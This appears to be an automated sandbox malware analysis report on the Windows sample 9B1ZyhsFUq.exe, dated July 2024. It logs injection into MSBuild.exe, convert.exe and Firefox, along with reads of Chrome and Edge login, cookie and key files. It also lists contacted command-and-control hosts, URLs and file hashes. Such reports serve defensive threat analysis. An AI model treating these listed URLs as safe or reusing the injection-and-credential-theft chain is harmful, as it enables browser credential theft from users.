Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtAllocateVirtualMemory: Direct from: 0x77672BEC	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtDeviceIoControlFile: Direct from: 0x77672AEC	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtQuerySystemInformation: Direct from: 0x776748CC	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtQueryAttributesFile: Direct from: 0x77672E6C	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtSetInformationThread: Direct from: 0x77672B4C	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtOpenSection: Direct from: 0x77672E0C	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtQueryVolumeInformationFile: Direct from: 0x77672F2C	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtAllocateVirtualMemory: Direct from: 0x776748EC	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtSetInformationThread: Direct from: 0x776663F9	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtReadVirtualMemory: Direct from: 0x77672E8C	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtCreateKey: Direct from: 0x77672C6C	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtClose: Direct from: 0x77672B6C
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtWriteVirtualMemory: Direct from: 0x7767490C	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtAllocateVirtualMemory: Direct from: 0x77673C9C	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtDelayExecution: Direct from: 0x77672DDC	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtCreateUserProcess: Direct from: 0x7767371C	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtQuerySystemInformation: Direct from: 0x77672DFC	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtQueryInformationProcess: Direct from: 0x77672C26	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtResumeThread: Direct from: 0x77672FBC	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtReadFile: Direct from: 0x77672ADC	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtAllocateVirtualMemory: Direct from: 0x77672BFC	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtResumeThread: Direct from: 0x776736AC	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtSetInformationProcess: Direct from: 0x77672C5C	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtMapViewOfSection: Direct from: 0x77672D1C	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtNotifyChangeKey: Direct from: 0x77673C2C	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtWriteVirtualMemory: Direct from: 0x77672E3C	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtCreateMutant: Direct from: 0x776735CC	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: NULL target: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: NULL target: C:\Windows\SysWOW64\convert.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: NULL target: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: NULL target: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 96B008	Jump to behavior

Source: nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000A.00000000.1642778895.0000000001420000.00000002.00000001.00040000.00000000.sdmp, nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000A.00000002.2510660428.0000000001421000.00000002.00000001.00040000.00000000.sdmp, nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000D.00000000.1785950293.0000000000E01000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000A.00000000.1642778895.0000000001420000.00000002.00000001.00040000.00000000.sdmp, nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000A.00000002.2510660428.0000000001421000.00000002.00000001.00040000.00000000.sdmp, nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000D.00000000.1785950293.0000000000E01000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000A.00000000.1642778895.0000000001420000.00000002.00000001.00040000.00000000.sdmp, nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000A.00000002.2510660428.0000000001421000.00000002.00000001.00040000.00000000.sdmp, nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000D.00000000.1785950293.0000000000E01000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: EProgram Manager
Source: nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000A.00000000.1642778895.0000000001420000.00000002.00000001.00040000.00000000.sdmp, nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000A.00000002.2510660428.0000000001421000.00000002.00000001.00040000.00000000.sdmp, nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000D.00000000.1785950293.0000000000E01000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\convert.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

IP	Domain	Country	ASN	ASN Name	Malicious
203.161.43.228	www.firmshow.top	Malaysia	45899	VNPT-AS-VNVNPTCorpVN	false
172.67.189.102	investdirectinsurance.com	United States	13335	CLOUDFLARENETUS	false
38.47.158.215	8418a72e.jl800.vip.cname.scname.com	United States	174	COGENT-174US	false
3.33.130.190	theridleysuk.co.uk	United States	8987	AMAZONEXPANSIONGB	true
38.47.158.160	e6375a47.jl884.vip.cname.scname.com	United States	174	COGENT-174US	false

Name	Malicious	Antivirus Detection	Reputation
https://investdirectinsurance.com/assuence/litesolidCha/Footer.cli	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.jl800.vip/g67v/	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.d99qtpkvavjj.xyz/r4rr/	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.theridleysuk.co.uk/frbh/	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://investdirectinsurance.com/assuence/litesolidCha/Oszina.cli	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.firmshow.top/02nb/?odlXV=wAM00RPxm4SI4CXmbVVIy3I1PpnrRkiLCY5B6OI1JPNyCoxACldRit5a2XiaNEn9mU81Z8Y/J9c7Sme1Jv71fP4xTcu1wI0JIyM1RMLSZxEp7JGf5Q==&3rb=9LUll6	false	Avira URL Cloud: safe	unknown
http://www.firmshow.top/02nb/	false	5%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.jl884.vip/r4wk/?odlXV=x9GkKIHXkLsCiyVr8u8o1dWkHkpveCE8pq06snQr36Jjj9CRM0vMnoakwWLgrIMHyYBq6SPCqUTgPlgJ6rJOJebRDbzl2T1aaRGoo2pz4PsH3zqV1w==&3rb=9LUll6	true	Avira URL Cloud: safe	unknown

ID:	1483420
Product:	CloudBasic
Start time:	11:38:09
Start date:	27.07.2024
Sample:	9B1ZyhsFUq.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	0c7b233a4bf0fc22c9e2a49818bc90a1
SHA1:	026eeec2d42c9f20c66e9c9bd52f495e83a689f0
SHA256:	d1743c107eedb9e740537df6cd35db93dd2a45ea952f4712ca134846dba1c7e5
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Windows Analysis Report 9B1ZyhsFUq.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
9B1ZyhsFUq.exe

Malware Threat Intel
Provided by

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\9B1ZyhsFUq.exe.log	CSV text	934DBC1E02CF807D1963341902D2D0AF	88B7030115ABFDCE452EE7E84283DF386EAF9AD9	6F38290F811AED98A3DBE2B0F93F9C4957F733C161BADECA0FB25ABE39649D3C
C:\Users\user\AppData\Local\Temp\-16743	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7	0AB67F0950F46216D5590A6A41A267C7	3E0DD57E2D4141A54B1C42DD8803C2C4FD26CB69	4AE2FD6D1BEDB54610134C1E58D875AF3589EDA511F439CDCCF230096C1BEB00